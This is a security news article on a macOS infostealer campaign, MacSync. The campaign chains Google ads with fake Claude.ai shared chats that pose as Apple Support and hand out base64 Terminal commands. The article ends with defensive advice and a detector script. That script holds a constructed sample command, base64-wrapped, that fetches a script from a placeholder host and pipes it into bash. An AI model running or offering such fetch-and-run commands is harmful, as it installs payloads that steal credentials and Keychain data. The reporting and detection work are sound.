MacSync Infostealer Weaponizes Google Ads and Claude.ai Chats

Attackers chain Google sponsored ads with fake Claude.ai chat sessions to deliver MacSync, a macOS infostealer harvesting Keychain contents and browser credentials.

    An active malvertising operation is chaining two separate platforms — Google’s paid search results and Anthropic’s Claude.ai shared-chat feature — into a single infection pipeline that ultimately delivers MacSync, a macOS infostealer capable of extracting browser credentials, session cookies, and the full contents of the macOS Keychain.

    MacSync Malvertising Chain Exploits Google Ads and Claude.ai Shared Sessions

    The campaign initiates when a user searches Google for terms related to downloading Claude for Mac. Threat actors behind the operation have purchased sponsored search placements that display with the legitimate claude.ai domain visible in the ad unit, making the advertisement visually indistinguishable from an authentic Anthropic result. Users who click through are not taken to Anthropic’s website; instead, they are redirected to Claude.ai shared chat sessions that the attackers control.

    Claude.ai allows users to share conversation transcripts via public links — a legitimate collaboration feature that the campaign repurposes as a delivery mechanism. The shared sessions are staged to impersonate Apple Support representatives, and they present victims with base64-encoded Terminal commands framed as the required installation steps for “Claude Code on Mac.” Because the commands appear within what looks like an official support interaction hosted on a real Anthropic subdomain, users who have already been partially deceived by the Google ad are unlikely to question the instructions at this stage.

    Base64-Encoded Terminal Commands Fetch Obfuscated Shell Scripts

    When a victim decodes and executes the provided Terminal commands, the commands reach out to attacker-controlled infrastructure and retrieve obfuscated shell scripts that deliver the MacSync payload. Researchers have observed that the obfuscation is polymorphic — each request to the delivery server returns a functionally identical but structurally unique script — a technique that undermines signature-based detection tools that rely on matching known byte patterns. The payload executes entirely in memory rather than writing a persistent binary to disk, further reducing the likelihood of detection by endpoint security tools that monitor the filesystem for malicious installations.

    The two-platform structure of the delivery chain is operationally significant. Google’s ad platform provides initial reach to a large pool of targeted users, while Claude.ai’s domain lends the subsequent interaction an air of legitimacy that a purpose-built phishing page would not carry. Neither platform is inherently compromised; the campaign exploits legitimate features of both services.

    MacSync Harvests macOS Keychain, Browser Data, and Session Cookies

    Once active in memory, MacSync extracts stored credentials and session cookies from major browsers and specifically targets the macOS Keychain — the system-level secure storage that holds Wi-Fi passwords, application credentials, and cryptographic certificates. Access to Keychain contents gives attackers a broad view of a victim’s authentication assets well beyond what browser-level theft alone would yield, potentially exposing credentials for enterprise VPNs, cloud storage services, and internal tools that are stored there by macOS and third-party applications.

    The malware also profiles the victim’s system before completing execution. It checks the device’s keyboard locale setting and aborts the infection sequence if it detects a Russian-language or Commonwealth of Independent States regional keyboard configuration. This deliberate geographic exclusion is a technique commonly associated with threat actors who operate from within those regions and wish to avoid inadvertently infecting systems that could draw local law enforcement attention. The behavior does not confirm attribution to any specific group but does narrow the operational profile.

    Google Ads Malvertising and the macOS Threat Landscape

    Malvertising through Google’s sponsored search results has become a recurring attack vector targeting macOS users, in part because macOS’s reputation for security leads some users to scrutinize downloaded software less closely than Windows users would. Campaigns using this channel to target macOS have previously distributed trojanized versions of widely used applications, including Homebrew, Arc Browser, and various VPN clients, according to research published by security vendors tracking macOS-specific threat activity.

    How to Spot MacSync-Linked Terminal Commands Before Running Them

    Security practitioners offer several indicators that can help users identify suspicious Terminal instructions before executing them. Legitimate software installers distributed by major vendors do not require users to manually decode base64 strings and paste the result into a Terminal session; that workflow is not a standard macOS software installation pattern. Commands that include curl or wget calls to unfamiliar domains, combined with pipe operators that pass downloaded content directly to a shell interpreter, should be treated as high-risk regardless of the apparent source of the instruction.
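The checks above can be applied mechanically before anything is pasted into Terminal. The script below is an added example, not code from the article or from any vendor named in it: it decodes any base64 token so the hidden command becomes visible, flags pipelines that feed fetched or decoded content into a shell, and lists the hosts a command would contact so they can be compared against the vendor's documented domain. The sample command and the `example.invalid` host are constructed for illustration.

```python
import base64
import re
import shlex
from urllib.parse import urlparse

# Constructed sample in the shape the article describes: a base64 blob that
# decodes to a curl-to-shell one-liner. example.invalid is a reserved name.
HIDDEN_CMD = "curl -fsSL https://example.invalid/install.sh | bash"
SAMPLE_CMD = 'echo "%s" | base64 -d | bash' % base64.b64encode(HIDDEN_CMD.encode()).decode()

SHELLS = {"sh", "bash", "zsh", "dash"}
DOWNLOADERS = {"curl", "wget"}
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def decode_embedded_base64(cmd: str) -> list[str]:
    """Decode every token that looks like base64 and yields valid UTF-8 text."""
    decoded = []
    for tok in shlex.split(cmd):
        if B64_TOKEN.match(tok):
            try:
                decoded.append(base64.b64decode(tok, validate=True).decode("utf-8"))
            except ValueError:  # covers binascii.Error and UnicodeDecodeError
                continue  # long alphanumeric word, not a real payload
    return decoded

def pipes_into_shell(cmd: str) -> bool:
    """True when a pipeline stage after '|' is a shell interpreter (... | bash)."""
    stages = [s.split() for s in cmd.split("|")]
    return any(st and st[0] in SHELLS for st in stages[1:])

def remote_hosts(cmd: str) -> list[str]:
    """Hostnames in URL tokens, to compare against the vendor's documented domain."""
    hosts = [urlparse(t).hostname for t in shlex.split(cmd) if t.startswith(("http://", "https://"))]
    return [h for h in hosts if h]

def flag_terminal_command(cmd: str, _nested: bool = False) -> list[str]:
    """Reasons a pasted command matches the high-risk patterns described above.
    Base64 payloads are decoded and inspected so the hidden command is visible."""
    reasons = []
    if pipes_into_shell(cmd):
        reasons.append("pipes fetched or decoded content straight into a shell")
    if DOWNLOADERS & set(shlex.split(cmd)):
        reasons.append("downloads from: " + ", ".join(remote_hosts(cmd) or ["(no URL found)"]))
    for hidden in decode_embedded_base64(cmd):
        reasons.append("hides a base64-encoded command: " + hidden)
        if not _nested:  # inspect one level of decoded payload
            reasons.extend(flag_terminal_command(hidden, _nested=True))
    return reasons
```

Run `flag_terminal_command(SAMPLE_CMD)` to see the decoded inner command and the host it would fetch from; an empty list means none of the patterns matched, which is a necessary but not sufficient sign that the command is safe.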

    Users who receive installation guidance through any chat interface — including AI assistant platforms — should independently verify that the domain and account presenting the instructions are authentic before executing any system-level commands. Anthropic has published documentation on the official Claude Code installation process through its own website; comparing that documentation against instructions received through third-party links is a straightforward verification step.

    Reducing MacSync Exposure via DNS Filtering and Search Ad Policies

    Organizations can reduce exposure to malvertising campaigns by configuring DNS filtering or browser extensions that flag sponsored search results before users click them, or by enforcing policies that route software downloads through approved internal repositories rather than public search engines. For individuals, hovering over a sponsored result to inspect the full destination URL — beyond the display domain shown in the ad — often reveals redirects that the display domain does not reflect.

    macOS users should also review Keychain Access settings and consider whether applications have been granted broader Keychain access than their function requires. Rotating credentials stored in the Keychain following any suspected malware exposure is advisable, given the breadth of what MacSync is designed to extract.
